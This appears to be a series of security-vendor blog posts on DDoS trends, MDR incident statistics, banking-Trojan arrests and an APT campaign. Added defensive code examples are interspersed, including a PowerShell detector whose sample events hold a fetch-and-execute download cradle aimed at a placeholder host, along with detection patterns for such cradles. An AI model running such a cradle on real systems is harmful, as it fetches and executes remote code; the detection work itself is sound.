  • APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure’s macOS-supported Python malware.
  • As illustrated by the campaigns of various threat actors – including BountyGlad, HotCousin, GoldenJackal, ScarCruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants – geo-politics continues to drive APT developments.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

28 July 2021

DDoS attacks in Q2 2021

News overview

In terms of big news, Q2 2021 was relatively calm, but not completely eventless. For example, April saw the active distribution of a new DDoS botnet called Simps — the name under which it introduced itself to owners of infected devices. The malware creators promoted their brainchild on a specially set-up YouTube channel and Discord server, where they discussed DDoS attacks. The actual DDoS functionality of Simps is not original: the code overlaps with the Mirai and Gafgyt botnets.

That said, nor does Gafgyt rely on originality: a handful of modules in the new variants (detected by Uptycs) were all borrowed from Mirai, the most widespread botnet. In particular, Gafgyt’s authors copied its implementation of various DDoS methods, such as TCP, UDP and HTTP flooding, as well as its brute-force functionality for hacking IoT devices via the Telnet protocol.

Mirai’s code formed the basis of the ZHtrap botnet, which became known this quarter. This malware is of interest for its use of infected devices as honeypots. ZHtrap first collects the IP addresses of devices that attack the trap, and then attempts to attack these devices itself.

Lately cybercriminals have been actively seeking out new services and protocols for amplifying DDoS attacks. Q2 2021 was no exception: in early July researchers at Netscout reported an increase in attacks using the Session Traversal Utilities for NAT (STUN) protocol. This protocol is used to map internal IP addresses and ports of hosts hidden behind NAT to external ones. Using it, attackers were able to increase the volume of junk traffic by a factor of just 2.32, but in combination with other attack vectors, the DDoS power reached 2TB/s. In addition, hijacking STUN servers to be used as reflectors can disable their main functionality. The organizations that use STUN would be wise to make sure their servers are protected against such attacks. At the time of posting, there were more than 75,000 vulnerable servers worldwide.

Another new DDoS vector has yet to be harnessed by cybercriminals. It is linked to a vulnerability in DNS resolvers that allows amplification attacks on authoritative DNS servers. The bug was named TsuNAME. It works as follows: if a configuration error causes the DNS records of certain domains to point to each other, the resolver will endlessly forward the request from one domain to another, significantly increasing the load on their DNS servers. Such errors can occur by accident: in early 2020, two misconfigured domains caused a 50% increase in the traffic flow on authoritative DNS servers in the NZ domain zone, and a similar incident in a European domain zone led to a tenfold rise in traffic. If an attacker were to create multiple domains pointing to each other, the scale of the problem would be considerably greater.

Attacks on DNS servers are dangerous because all the resources they serve become unavailable, regardless of their size and level of DDoS protection. This is well illustrated by the attack on DNS provider Dyn that downed more than 80 major websites and online services in 2016. To prevent the TsuNAME vulnerability from having the same devastating consequences, the researchers recommend that owners of authoritative servers regularly identify and fix such configuration errors in their domain zone, and that owners of DNS resolvers ensure detection and caching of looped requests.
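The authoritative-side check recommended above, as an added example (not code from Kaspersky or the TsuNAME researchers): it builds the inter-zone dependency graph from each zone's NS records and reports every cycle of zones that delegate to each other's name servers. The input format (zone name to list of NS hostnames) and the sample zones are constructed for this illustration.

```python
"""Detect cyclic NS delegations (the TsuNAME misconfiguration) across a set of zones.

Added example, not Kaspersky's or the TsuNAME researchers' code. The input
format (zone name -> list of NS hostnames) and the sample zones below are
constructed for this demonstration.
"""
from typing import Dict, List, Optional, Set


def _normalize(name: str) -> str:
    """Strip the trailing dot and lower-case, so comparisons are uniform."""
    return name.rstrip(".").lower()


def _under(hostname: str, zone: str) -> bool:
    """True if hostname is the zone apex or lies anywhere below it."""
    host, z = _normalize(hostname), _normalize(zone)
    return host == z or host.endswith("." + z)


def delegation_graph(zone_ns: Dict[str, List[str]]) -> Dict[str, Set[str]]:
    """Map each zone to the other known zones its name servers are named in.

    An NS name inside the zone itself is in-bailiwick and is resolved with glue
    from the parent, so it adds no edge. An NS name under a zone we hold no
    data for adds no edge either, since we cannot evaluate it offline.
    """
    zones = {_normalize(z) for z in zone_ns}
    graph: Dict[str, Set[str]] = {z: set() for z in zones}
    for zone, servers in zone_ns.items():
        z = _normalize(zone)
        for ns in servers:
            if _under(ns, z):
                continue
            owner: Optional[str] = None
            for candidate in zones:
                # the longest (most specific) matching zone owns the NS name
                if _under(ns, candidate) and (owner is None or len(candidate) > len(owner)):
                    owner = candidate
            if owner is not None:
                graph[z].add(owner)
    return graph


def find_delegation_cycles(zone_ns: Dict[str, List[str]]) -> List[List[str]]:
    """Return every cycle of zones whose NS records depend on each other.

    A resolver following such a chain never obtains an address for any name
    server in the cycle; one without loop detection keeps re-querying the
    authoritative servers, which is the load TsuNAME describes. Each cycle is
    reported once, rotated so its lexicographically smallest zone comes first.
    """
    graph = delegation_graph(zone_ns)
    cycles: List[List[str]] = []
    seen: Set[tuple] = set()

    def walk(node: str, path: List[str]) -> None:
        for nxt in sorted(graph[node]):
            if nxt in path:
                cyc = path[path.index(nxt):]
                i = cyc.index(min(cyc))
                key = tuple(cyc[i:] + cyc[:i])
                if key not in seen:
                    seen.add(key)
                    cycles.append(list(key))
            else:
                walk(nxt, path + [nxt])

    for start in sorted(graph):
        walk(start, [start])
    return cycles


# Constructed sample: example.com and example.org delegate to each other's
# name servers; good.net is healthy (one in-bailiwick NS, one in an unknown zone).
SAMPLE_ZONES: Dict[str, List[str]] = {
    "example.com.": ["ns1.example.org.", "ns2.example.org."],
    "example.org.": ["ns1.example.com."],
    "good.net.": ["ns1.good.net.", "ns2.otherdns.io."],
}

if __name__ == "__main__":
    for cycle in find_delegation_cycles(SAMPLE_ZONES):
        print("cyclic delegation:", " -> ".join(cycle + [cycle[0]]))
```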

It was a DNS flood in early April that disrupted the operation of Xbox Live, Microsoft Teams, OneDrive and other Microsoft cloud services. Although the Azure DNS service, which handles the domain names of most of the services, has mechanisms to protect against junk traffic, an unnamed coding error meant it could not cope with the flow of requests. The situation was aggravated by legitimate users trying in vain to access the unresponsive services. However, Microsoft fixed the bug fairly quickly, and the services were soon up and running again.

One other large-scale DDoS attack swept through Belgium, hitting Belnet and other ISPs. Users across the country experienced service interruptions, and websites in the BE domain zone were temporarily unavailable. Junk traffic was sent from IP addresses in 29 countries worldwide, and, as Belnet noted, the attackers kept changing tactics, making the attack extremely difficult to stop. It forced the Belgian parliament to postpone several sessions, while educational institutions had problems with distance learning, and the transport company STIB likewise with the sale of tickets. Online registration systems for COVID-19 vaccinations were also affected.

The council of Grenoble-Alpes Métropole in France also had to suspend a session for several hours. A DDoS attack involving about 60,000 bots made it impossible to broadcast the event live.

Besides Belnet, several other European ISPs were targeted by DDoS attacks. For example, Ireland’s Nova fell victim to cybervillains. No confidential data was affected, a spokesperson said, adding that “we are the latest Irish ISP to be attacked and we won’t be the last, as the criminals cycle through Irish networks one by one.”

That said, there is no need to direct junk traffic at ISPs’ own resources in order to disrupt their networks. For instance, Zzoomm, a British broadband provider, suffered from a DDoS assault on one of its upstream suppliers, which in turn was not the real target: cybercriminals were trying to extort a ransom from one of its customers.

In general, ransom DDoS attacks continued to gain momentum. A cybercriminal group known for its fondness of masquerading as various APT outfits again made the news, this time under the fictitious moniker Fancy Lazarus, composed of the names of two groups: Lazarus and Fancy Bear. Although cybercriminals attack organizations the world over, the victims of Fancy Lazarus were predominantly in the US, and the size of the ransom was lowered from 10–20 to 2 BTC.

Avaddon ransomware operators also tried to intimidate victims through DDoS attacks. In early May, they flooded the site of Australian company Schepisi Communications with junk traffic. The organization partners Telstra, a major Australian provider, selling SIM cards and cloud services on the latter’s behalf. Later that same month, French insurance company AXA, one of the largest in the field, also fell victim to Avaddon. As in the case of Schepisi Communications, besides encrypting and stealing data from several of its branches, the cybercriminals carried out a DDoS attack on its websites. After a string of devastating attacks in June, the ransomware creators announced their retirement.

In May, the Irish Health Service Executive (HSE) was hit by a DDoS attack. The attacks would have been unremarkable had they not been immediately followed by an invasion of Conti ransomware. Whether these events are related is uncertain, but the ransomware operators could have used DDoS as a cover to penetrate the company’s network and steal data.

Attacks on educational institutions continued in Q2, occurring as they do throughout the school year. For example, malicious actors forced Agawam Public Schools in Massachusetts to shut down their guest network to protect the main network. This meant that Internet access was available only on school-issued devices.

Nor did video games escape attention this reporting period. The Titanfall and Titanfall 2 servers suffered DDoS-related outages in April and May. At least some of these attacks may have targeted specific streamers. To protect against attackers, enthusiasts created a mod that hides players’ names. However, this did not stop the attacks on the game servers. As for the developer, Respawn Entertainment, it took care of DDoS protection, but not in Titanfall, rather in Apex Legends, where the new version, in the event of an attack, chucks everyone out of the game, with compensation for any losses incurred. Back in Titanfall, however, the problem is so acute that a hacktivist player decided to hack Apex Legends to raise awareness of it.

Another hacktivist, after a decade of hiding from the law, was caught in Mexico and deported to the US. Christopher Doyon had been one of the organizers of the 2010 protests against a law banning rough sleeping in Santa Cruz, California. Following the crackdown on the protests, Doyon launched a DDoS attack on the Santa Cruz County website. Having been charged, the hacktivist failed to appear at a court hearing pending trial in 2012. Consequently, he was put on the international wanted list. Now Doyon will finally stand trial on the decade-old charges.

Quarter trends

As expected, Q2 2021 was calm. We recorded a slight fall in the total number of DDoS attacks compared to the previous quarter, which is typical for this period and seen every year, barring the anomalous 2020. This drop we traditionally associate with the start of the vacation period. It tends to continue through Q3, and we expect no change this year.

Comparative number of DDoS attacks, Q1 and Q2 2021, and Q2 2020. Q2 2020 data is taken as 100%

Note the exceptional duration of smart DDoS attacks in the past quarter. This is due to several abnormally long, though not too powerful, attacks on law enforcement resources. We see no correlation between these attacks and any high-profile event. There may be a causal connection somewhere, but since there is no way of knowing, it remains to interpret them as statistical anomalies, which do crop up every so often. With these attacks excluded from the sample, the data on DDoS duration is closer to the norm with different periods fluctuating by no more than 30% relative to each other.

DDoS attack duration, Q1 and Q2 2021, and Q2 2020. Q2 2020 data is taken as 100%

Statistics Methodology

Kaspersky has a long history of combating cyber threats, including DDoS attacks of all types and complexity. The company experts monitor botnets using the Kaspersky DDoS Intelligence system.

As part of the Kaspersky DDoS Protection solution, DDoS Intelligence intercepts and analyzes commands sent to bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q2 2021.

In the context of this report, an incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS victims and C&C servers are determined by their IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.
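The counting rules above, implemented as an added example (not Kaspersky's DDoS Intelligence code): intercepted bot commands are grouped by target IP and botnet, an activity gap of 24 hours or more starts a new attack, and unique targets are counted by unique IP address. The event record, its field names and the sample events are constructed for this illustration.

```python
"""Count DDoS attacks with the report's rules: one attack per (target, botnet)
pair, split wherever the botnet is quiet for 24 hours or more.

Added example, not Kaspersky's DDoS Intelligence code. The event record, its
field names and the sample events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, NamedTuple, Tuple


class BotnetEvent(NamedTuple):
    target_ip: str      # attacked resource, identified by its IP address
    botnet: str         # identifier of the botnet whose C&C issued the command
    seen_at: datetime   # when the attack command was intercepted


# The text says an attack continues while gaps "do not exceed 24 hours" and
# that a gap of "24 hours or more" makes two attacks; exactly 24 hours is
# treated here as a split (assumption, following the text's own example).
SPLIT_GAP = timedelta(hours=24)

Attack = Tuple[str, str, datetime, datetime]  # target, botnet, first seen, last seen


def group_attacks(events: Iterable[BotnetEvent]) -> List[Attack]:
    """Merge individual bot commands into attacks.

    Commands from different botnets against the same target never merge,
    and commands from one botnet merge only while the gap stays under 24h.
    """
    by_key: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ev in events:
        by_key[(ev.target_ip, ev.botnet)].append(ev.seen_at)

    attacks: List[Attack] = []
    for (target, botnet), times in sorted(by_key.items()):
        times.sort()
        start = last = times[0]
        for t in times[1:]:
            if t - last >= SPLIT_GAP:
                attacks.append((target, botnet, start, last))
                start = t
            last = t
        attacks.append((target, botnet, start, last))
    return attacks


def count_attacks(events: Iterable[BotnetEvent]) -> int:
    return len(group_attacks(list(events)))


def count_unique_targets(events: Iterable[BotnetEvent]) -> int:
    """Unique targets are counted by unique IP address, as in the report."""
    return len({ev.target_ip for ev in events})


def longest_attack_hours(events: Iterable[BotnetEvent]) -> float:
    """Duration of the longest attack, first to last command seen, in hours."""
    durations = [(end - start).total_seconds() / 3600
                 for _, _, start, end in group_attacks(list(events))]
    return max(durations, default=0.0)


# Constructed sample (documentation address ranges). Expected: 5 attacks,
# 2 unique targets, longest attack 23 hours.
SAMPLE_EVENTS = [
    BotnetEvent("203.0.113.10", "botnet-A", datetime(2021, 4, 13, 8, 0)),
    BotnetEvent("203.0.113.10", "botnet-A", datetime(2021, 4, 13, 10, 0)),
    BotnetEvent("203.0.113.10", "botnet-A", datetime(2021, 4, 14, 7, 0)),   # 21h gap: same attack
    BotnetEvent("203.0.113.10", "botnet-A", datetime(2021, 4, 16, 12, 0)),  # >24h gap: new attack
    BotnetEvent("203.0.113.10", "botnet-B", datetime(2021, 4, 13, 9, 0)),   # other botnet: separate
    BotnetEvent("198.51.100.5", "botnet-A", datetime(2021, 6, 2, 0, 0)),
    BotnetEvent("198.51.100.5", "botnet-A", datetime(2021, 6, 3, 0, 0)),    # exactly 24h: split
]

if __name__ == "__main__":
    for target, botnet, start, end in group_attacks(SAMPLE_EVENTS):
        print(f"{target:14} {botnet:9} {start:%Y-%m-%d %H:%M} -> {end:%Y-%m-%d %H:%M}")
    print("attacks:", count_attacks(SAMPLE_EVENTS),
          "unique targets:", count_unique_targets(SAMPLE_EVENTS))
```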

Quarter summary

  • Q2’s leader by number of DDoS attacks is again the US (36%). The share of China (10.28%) continued to fall, while Poland (6.34%) climbed into the TOP 3 most attacked countries.
  • The most DDoS-active day in the quarter was June 2, when we registered 1,164 attacks. On the quietest day, we observed only 60 DDoS attacks.
  • Most DDoS attacks occurred on Tuesdays (15.31%), while the calmest day of the week was Sunday (13.26%).
  • The longest DDoS attack lasted 776 hours (more than 32 days).
  • UDP flooding was used in 60% of DDoS attacks.
  • The country with the most botnet C&C servers was the US (47.95%), while the bulk of bots attacking IoT devices in order to assimilate them were located in China.
DDoS attack geography

In Q2 2021, as in Q1, most DDoS attacks were directed at US-based resources (36%). China (10.28%), the perennial leader until this year, continued to lose ground, shedding another 6.36 p.p. Third place this quarter was taken by a newcomer in the ranking, Poland (6.34%), whose share was up by 4.33 p.p. against the previous reporting period. Canada (5.23%), which rounded out the TOP 3 in Q1, fell to fifth place, despite gaining 0.29 p.p.

In fourth place by number of DDoS attacks in Q2 was Brazil (6.06%), whose share almost doubled. Sixth in the ranking was France (5.23%), behind Canada by only a tiny fraction of a percentage point. Germany (4.55%) remained in seventh position, while the UK (3.82%) moved into eighth. At the foot of the ranking are the Netherlands (3.33%) and Hong Kong (2.46%), whose shares, like China’s, continued to nosedive.

Distribution of DDoS attacks by country, Q1 and Q2 2021

A look at the countries with the highest number of unique targets also shows an increase in DDoS activity in Poland (7.44%) and Brazil (6.25%), which ranked second and third, respectively, and a decrease in activity in China (5.99%), which dropped to fourth place. The TOP 10 tends to be pegged to the list of countries with the highest number of DDoS attacks: the US remains in top spot (38.60%), fifth to eighth places belong to France (4.97%), Germany (4.86%), the UK (4.40%) and Canada (4.20%), respectively, followed by the Netherlands (3.40%) and Hong Kong (1.81%).

Distribution of unique DDoS targets by country, Q1 and Q2 2021

Dynamics of the number of DDoS attacks

As noted above, Q2 turned out relatively calm. On average, the number of DDoS attacks per day fluctuated between 500 and 800. On the quietest day of the reporting period, April 18, we observed only 60 attacks. On two other days, June 24 and 25, the number of attacks fell short of 200. Nevertheless, Q2 had its share of turbulent days with more than 1,000 DDoS attacks. For instance, we observed 1,061 attacks on April 13 and 1,164 on June 2.

Dynamics of the number of DDoS attacks, Q2 2021

The distribution of DDoS attacks by day of the week in Q2 was, if anything, even more uniform than in Q1: the difference between the busiest and quietest days was only 2.05 p.p. At the same time, activity shifted to the start of the week. The share of Monday through Thursday relative to Q1 increased, while the end of the week, having been the most turbulent in the previous reporting period, grew calmer. We observed the highest number of attacks on Tuesdays (15.31%), while the quietest day this time was Sunday (13.26%).

Distribution of DDoS attacks by day of the week, Q1 and Q2 2021

Duration and types of DDoS attacks

In Q2, the average DDoS attack duration remained virtually unchanged from the previous reporting period: 3.18 hours versus 3.01 in Q1. What’s more, there was a slight increase both in the share of very short attacks lasting less than 4 hours (from 91.37% to 93.99%) and in the share of long (from 0.07% to 0.13%) and ultra-long (from 0.13% to 0.26%) ones. By contrast, the share of moderately long attacks in Q2 fell slightly, and attacks lasting 5–9 hours (2.65%) lost 1.51 p.p.

The maximum attack duration continued to increase. If in Q4 2020 we saw no attacks lasting more than 302 hours, the longest attack in Q1 2021 was 746 hours (more than 31 days), and Q2 topped that with a 776-hour-long attack (more than 32 days).

Distribution of DDoS attacks by duration, Q1 and Q2 2021

Looking at the distribution by type of attack, we see that UDP flooding in Q2 significantly increased its slice (60% vs 42% in Q1). SYN flooding (23.67%), which until 2021 was the most common type of DDoS, is fighting to regain lost territory: this quarter it swapped places with TCP flooding (13.42%) to claim second place.

Distribution of DDoS attacks by type, Q2 2021

Botnet distribution geography

Among botnet C&C servers, 90% were located in ten countries in Q2. The biggest share was in the US (47.95%), which added 6.64 p.p. to its score in the previous reporting period. In second place, as in Q1, is Germany (12.33%), and in third place the Netherlands (9.25%). France (4.28%) retained fourth position, followed by Canada (3.94%), whose share has doubled since last quarter.

The sixth-placed country by number of botnet C&C servers, as in Q1, is Russia (3.42%). The Czech Republic (2.57%) climbed to seventh place, overtaking Romania (2.40%), which shared eighth and ninth places with the UK (2.40%). Singapore (1.54%) props up the TOP 10, while the Seychelles dropped out of the ranking, having almost no C&C servers used by active botnets.

Distribution of botnet C&C servers by country, Q2 2021

Attacks on IoT honeypots

Also in Q2 2021 we analyzed in which countries bots and servers were attacking IoT devices with a view to botnet expansion. This involved studying the statistics on Telnet and SSH attacks on our IoT honeypots. The country with the most devices from which SSH attacks were launched this quarter was China (31.79%). In second place was the US (12.50%), and in third Germany (5.94%). However, the bulk of attacks via SSH originated in Ireland (70.14%) and Panama (15.81%), which both had relatively few bots. This could suggest that among the attacking devices located in these countries there were powerful servers capable of infecting multiple devices worldwide simultaneously.

Geography of devices from which attempts were made to attack Kaspersky SSH traps, Q2 2021

The biggest share of bots attacking Telnet traps in Q2 also belonged to China (39.60%). In addition, many bots were located in India (18.54%), Russia (5.76%) and Brazil (3.81%). The attacks originated mostly in these same countries, the only difference being that bot activity in Russia (11.25%) and Brazil (8.21%) was higher than in India (7.24%), while China (56.83%) accounted for more than half of all attacks on Telnet honeypots.

Geography of devices from which attempts were made to attack Kaspersky Telnet honeypots, Q2 2021


The DDoS market continues to stabilize after last year’s shakeup. As expected, Q2 2021 demonstrated the traditional summer lull. That said, we did see some abnormally long attacks, as well as shifts in the DDoS geography. The number of attacks in China, which long topped the ranking, continued to decline, at the same time as DDoS activity in Poland and Brazil increased markedly. Other than that, it was a pretty ordinary second quarter.

At present, we see no grounds for a sharp rise or fall in the DDoS market in Q3 2021. As before, the market will be heavily dependent on cryptocurrency prices, which have been riding high, despite declining relative to their spring peak: 1 BTC is worth US$30,000–35,000, less than a couple of months ago, but still a tidy sum. With cryptocurrency prices still attractive, the DDoS market is not expected to grow. Most likely, the summer decline typical of the vacation period will continue through Q3.

21 July 2021

Managed Detection and Response in Q4 2020

 Download full report (PDF)

As cyberattacks become more sophisticated, and security solutions require more resources to analyze the huge amount of data gathered every day, many organizations feel the need for advanced security services that can deal with this growing complexity in real time, 24/7.

This article contains some analytical findings from Managed Detection and Response (MDR) operations during Q4 2020.

What is Kaspersky MDR

Kaspersky MDR uses Kaspersky Endpoint Security and Kaspersky Anti Targeted Attack Platform as low-level telemetry suppliers after MDR license activation. Raw telemetry is initially enriched and correlated in the cloud, then two levels of SOC analysis process the resulting alerts. The first level of SOC analysis is a neural network-based supervised ML model that is trained on alerts investigated by human analysts. The second level consists of on-duty SOC analysts, who triage alerts and provide recommendations on response to customers.

The MDR team also has a dedicated group for threat-hunting activities — proactive searching for threats through raw telemetry to find attacks that were not detected by automated logic, including ML/AI in the MDR cloud infrastructure. The threat-hunting team is responsible for detection engineering, so all threats found manually are then covered with automatic detection and prevention logic to speed up customer protection.

During the reporting period, Kaspersky MDR was used across all industry verticals as shown below, along with the share of detected incidents for each.

Data processing pipeline and security operations

In Q4 2020, the average number of raw events collected from one host was around 15,000. This comparatively low amount is explained by the comprehensive analysis that Kaspersky Endpoint Security performs right at the endpoint, such as object reputation checks, and by the fact that only the required minimum of telemetry is sent to the cloud for further analysis.

During the reported period, MDR processed approximately 65,000 alerts, followed by an investigation that resulted in 1,506 incidents reported to customers, approximately 93% of which were mapped to the MITRE ATT&CK framework.

From a security operations standpoint, incident processing depends on alert severity. High severity typically requires more time to investigate and provide recommendations on remediation steps.

Incident remediation efficiency

Most of the incidents (80.1%) were detected based on the first analyzed alert. This means that after the first true positive alert, remediation activities stopped the attack from happening and no new alerts were linked to the incident. This demonstrates that remediation is fairly efficient.

Incidents linked to 2-4 alerts account for 15.3%; they represent the main directions for detection engineering, both in new alert development and improvements to existing alerts.

Incidents linked with larger numbers of alerts are related to cases where fast remediation is not efficient or not allowed. Examples of these incidents include a new targeted attack that requires thorough investigation before active response, or security assessment engagements, where active counteraction against the attacker is not allowed.

Incident severity

According to the MDR incident severity classification, High-severity incidents are related to human-driven attacks or malware outbreaks with a high impact. Medium severity is related to incidents that significantly affect the efficiency or performance of assets covered by MDR. Finally, Low severity is related to incidents without a significant impact, which still ought to be fixed, for example, infection with grayware, such as adware, riskware, etc.

High-severity incidents can be caused by a number of factors:

  • APT, targeted attack
  • Offensive exercise
  • Artefacts of APT, targeted attack
  • Malware with critical impact
  • Likely-to-be-exploited vulnerability
  • DDoS/DoS with impact
  • Insider threat with impact (subversion, fraud)
  • Social engineering

In the analyzed period, the incident severity statistics and distribution of High-severity incidents were as follows.

Distribution of incidents by criticality

Types of High-severity incidents

Almost all of the verticals in the analyzed period were victims of targeted attacks. IT, Government and Industrial are the TOP 3. Companies that suffered from targeted attacks typically engaged in offensive exercises, a sign of adequate risk assessment.

Adversary tactics, techniques and procedures

As for the attack kill-chain stage, we do not see any correlation between incident severity and tactics at the moment of detection, although it might be expected that more complex attacks would be detected at a later stage.

Analysis of the detection technology has confirmed that there is a need for a combination of different detection systems, because the endpoint tactics are efficiently detected by EPP; SB provides better results at analyzing content before it reaches the endpoint, and all network communications are subject to IDS.

Next, there are the top performing (by the number of reported incidents) MITRE ATT&CK techniques, detected by telemetry from each sensor.

Analysis of tools that attackers use in the incidents shows that PowerShell is still number one and especially popular in High-severity incidents.


Analysis of incident statistics suggests the following recommendations on improving the security controls in place.

  • One third of all high-severity incidents were human-driven targeted attacks. Automated tools are not enough for fully detecting these, so manual threat hunting in combination with classical alert-driven monitoring should be implemented.
  • Professional red team exercises are very similar to advanced attacks and are thus a good approach to assessing the organization’s operational efficiency.
  • Nine percent of reported High-severity incidents were successful social engineering attacks, which demonstrates the need for raising employee security awareness.
  • Be ready to detect threats that use every tactic (attack kill chain phase).
  • Even a complex attack consists of simple steps and techniques; the detection of a particular technique can expose the whole attack.
  • Different detection technologies have different levels of efficiency with different attacker techniques. Maintain a variety of security technologies to increase the chances of successful detection.
  • Monitor PowerShell with built-in Windows events or comprehensive EDRs.
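The last recommendation, monitoring PowerShell through built-in Windows events, is the one most often implemented half-way: script block logging is enabled, but nobody inspects encoded command lines. The following added example (not Kaspersky's code) shows the minimum a detection rule should do over Windows event records: match common evasion markers in PowerShell script block events (Event ID 4104) and process creation events (Event ID 4688), and decode an -EncodedCommand argument (Base64 of UTF-16LE) so the same patterns can be applied to what actually ran. The event records, field names and command lines are constructed for this example.

```python
import base64
import re

# Markers that warrant analyst attention; each pattern is paired with a label.
SUSPICIOUS_PATTERNS = [
    (r"(?i)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"(?i)(?:Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient)", "download cradle"),
    (r"(?i)\b(?:IEX|Invoke-Expression)\b", "dynamic execution"),
    (r"(?i)FromBase64String", "inline base64 decoding"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
]


def build_sample_events():
    """Constructed sample records; the 'text' field stands in for ScriptBlockText
    (4104) or CommandLine (4688). Not real telemetry."""
    encoded = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16le")).decode()
    return [
        {"event_id": 4104, "host": "ws01", "text": "Get-ChildItem C:\\Temp | Measure-Object"},
        {"event_id": 4688, "host": "ws02", "text": f"powershell.exe -NoP -W Hidden -enc {encoded}"},
        {"event_id": 4104, "host": "ws03",
         "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
        {"event_id": 4688, "host": "ws04",
         "text": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    ]


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if there is none
    or it is not valid Base64/UTF-16LE."""
    m = re.search(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Flag PowerShell events that match any marker; patterns are re-applied to
    the decoded payload so an encoded download cradle is not missed."""
    findings = []
    for ev in events:
        if ev["event_id"] not in (4104, 4688):
            continue
        text = ev["text"]
        reasons = [label for pat, label in SUSPICIOUS_PATTERNS if re.search(pat, text)]
        if not reasons:
            continue
        decoded = decode_encoded_command(text)
        if decoded:
            reasons += [label for pat, label in SUSPICIOUS_PATTERNS
                        if re.search(pat, decoded) and label not in reasons]
        findings.append({"host": ev["host"], "event_id": ev["event_id"],
                         "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in analyze(build_sample_events()):
        print(f["host"], f["event_id"], f["reasons"], f["decoded"])
```

Only the hidden, encoded launch on ws02 and the download cradle on ws03 are flagged; the plain file listing and the -File invocation of an existing script are left alone. In production the `text` field comes from the ScriptBlockText of Microsoft-Windows-PowerShell/Operational 4104 events or the CommandLine of Security 4688 events (command-line auditing must be enabled for the latter).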

14 July 2021

Arrests of members of Tetrade seed groups Grandoreiro and Melcoz

Spain’s Ministry of the Interior has announced the arrest of 16 individuals connected to the Grandoreiro and Melcoz (also known as Mekotio) cybercrime groups. Both are originally from Brazil and form part of the Tetrade umbrella, operating for a few years now in Latin America and Western Europe.

Grandoreiro is a banking Trojan malware family that initially started its operations in Brazil. Similarly to two other malware families, Melcoz and Javali, Grandoreiro first expanded operations to other Latin American countries and then to Western Europe. We have witnessed Grandoreiro’s campaigns since at least 2016, with the attackers regularly improving techniques, striving to stay undetected and active for longer periods of time. Based on our analysis of campaigns we have seen Grandoreiro operate as a Malware-as-a-Service (MaaS) project.

Since January 2020, our telemetry shows that Grandoreiro has attacked mostly Brazil, Mexico, Spain, Portugal, and Turkey.

On the other hand, Melcoz (also known as Mekotio) is a banking Trojan family developed by the Tetrade group which has been active since at least 2018 in Brazil, before they decided to expand overseas. We found the group attacking assets in Chile in 2018 and, more recently, in Mexico. There are also likely victims in other countries, as some of the targeted banks have international operations. Generally, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. This malware steals passwords from browsers and from the device’s memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module.

Our telemetry confirms that since January 2020, Melcoz has been actively targeting Brazil, Chile, and Spain, among other countries.

If we compare Grandoreiro and Melcoz in terms of proliferation, it’s clear that Grandoreiro is more aggressive when targeting victims worldwide.

What can we now expect after the arrest of 16 individuals in Spain? The work carried out by the Guardia Civil of Spain in actioning these arrests is remarkable. However, since both malware families are from Brazil, the individuals arrested in Spain are just operators. In other words, the creators of Grandoreiro and Melcoz will likely remain in Brazil where they may develop new malware techniques and recruit new members in their countries of interest.

Kaspersky technologies detect both families as Trojan-Banker.Win32.Grandoreiro and Trojan-Banker.Win32.Melcoz.

We recommend that financial institutions stay vigilant and watch the threats that are part of the Tetrade umbrella closely while improving their authentication processes, boosting anti-fraud technology and threat intel data, and trying to understand and mitigate such risks. Detailed information about Tetrade with full IOCs and Yara rules and hashes of these threats is available to our Financial Threat Intel services users.

14 July 2021

LuminousMoth APT: Sweeping attacks for the chosen few

APT actors are known for the frequently targeted nature of their attacks. Typically, they will handpick a set of targets that in turn are handled with almost surgical precision, with infection vectors, malicious implants and payloads being tailored to the victims’ identities or environment. It’s not often we observe a large-scale attack conducted by actors fitting this profile, usually due to such attacks being noisy, and thus putting the underlying operation at risk of being compromised by security products or researchers.

We recently came across unusual APT activity that exhibits the latter trait – it was detected in high volumes, albeit most likely aimed at a few targets of interest. This large-scale and highly active campaign was observed in South East Asia and dates back to at least October 2020, with the most recent attacks seen around the time of writing. Most of the early sightings were in Myanmar, but it now appears the attackers are much more active in the Philippines, where there are more than 10 times as many known targets.

Further analysis revealed that the underlying actor, which we dubbed LuminousMoth, shows an affinity to the HoneyMyte group, otherwise known as Mustang Panda. This is evident in both network infrastructure connections, and the usage of similar TTPs to deploy the Cobalt Strike Beacon as a payload. In fact, our colleagues at ESET and Avast recently assessed that HoneyMyte was active in the same region. The proximity in time and common occurrence in Myanmar of both campaigns could suggest that various TTPs of HoneyMyte may have been borrowed for the activity of LuminousMoth.

